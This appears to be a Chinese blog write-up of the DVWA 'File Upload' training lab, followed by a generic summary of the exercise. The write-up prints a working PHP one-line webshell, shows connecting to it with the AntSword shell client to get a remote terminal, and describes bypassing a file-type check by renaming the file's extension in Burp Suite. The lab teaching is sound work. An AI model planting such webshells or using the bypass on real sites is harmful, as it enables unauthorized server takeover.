【DVWA】——File Upload(文件上传)

📖 前言:文件上传漏洞是由于对上传文件未作过滤或过滤机制不严(文件后缀或类型),导致恶意用户可以上传脚本文件,通过上传文件可达到控制网站权限的目的。


🕒 1. Low

满足这三个条件,攻击者就能够成功入侵

  • 木马上传成功,未被杀;
  • 知道木马的路径在哪;
  • 上传的木马能正常运行(解析)。

没有任何限制,所以直接上传一句简短代码(一句话木马)即可

<?php @eval($_POST['csb']);
echo "vulnerable";
?>

在这里插入图片描述
在这里插入图片描述

接下来需要用到一款Shell控制工具——中国蚁剑

中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。简而言之,中国蚁剑是一款的shell控制端软件。

🔎 中国蚁剑

第一次安装项目需要先初始化,我们解压到下面的文件夹

AntSword-Loader-v4.0.3-win32-x64\antSword-master

初始化完成后打开,首先右键空白处,点击添加数据

在这里插入图片描述
将上传的URL添加进去

http://192.168.31.57:8080/hackable/uploads/webshell.php

在这里插入图片描述

密码就是刚才后门的密码:csb,测试连接成功后即可添加

在这里插入图片描述

双击该URL地址,可以看到起其目录文件信息,随后右键在此处打开终端

在这里插入图片描述

在这里插入图片描述

此时就可以随意输入指令,实现远控了。

🕒 2. Medium

在这里插入图片描述
可以看到,靶场对文件类型做了限制,只允许上传png、jpeg

此时我们可以把一句话木马改为png后缀

在这里插入图片描述

然后使用BP抓包,将文件后缀改成php

在这里插入图片描述

在这里插入图片描述
使用webshell连接同上。


OK,以上就是本期知识点“File Upload(文件上传)”的知识啦~~ ,感谢友友们的阅读。后续还会继续更新,欢迎持续关注哟📌~
💫如果有错误❌,欢迎批评指正呀👀~让我们一起相互进步🚀
🎉如果觉得收获满满,可以点点赞👍支持一下哟~

❗ 转载请注明出处
作者:HinsCoder
博客链接:🔎 作者博客主页

好的,我可以为您提供一些关于DVWAFile Upload模块的实验步骤。首先,您需要了解一下DVWA是什么。DVWA(Damn Vulnerable Web Application)是一个用于练习网络渗透测试技能的虚拟机环境,其中包含多个漏洞,可供练习和学习。其中就包括File Upload模块。 以下是一些关于DVWAFile Upload模块的实验步骤: 1. 首先,您需要在本地安装DVWA,并启动它。您可以使用XAMPP等工具来安装和启动DVWA。 2. 登录到DVWA并选择File Upload模块。 3. 选择一个文件并上传。您可以尝试上传一些不同类型的文件,如图片、文本文件、PDF等。 4. 观察上传后的结果。如果上传成功,您应该能够看到一个已上传的文件列表,并且您上传的文件应该显示在列表中。 5. 试着上传一些恶意文件,如包含恶意代码的文件。观察上传后的结果并尝试分析它们的影响。 6. 尝试绕过文件上传的限制。您可以尝试通过修改文件扩展名、使用特殊字符或修改HTTP报文来绕过文件类型和大小的限制。 7. 尝试利用文件上传漏洞进行攻击。您可以尝试上传一个包含Web Shell的文件,并尝试通过Web Shell来获取系统权限。 需要注意的是,您在进行实验时应该遵循合法的道德和法律标准,不得以任何非法或不道德的方式使用这些技术。同时,您应该在安全的环境中进行实验,以避免对其他人或组织的系统造成损害。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值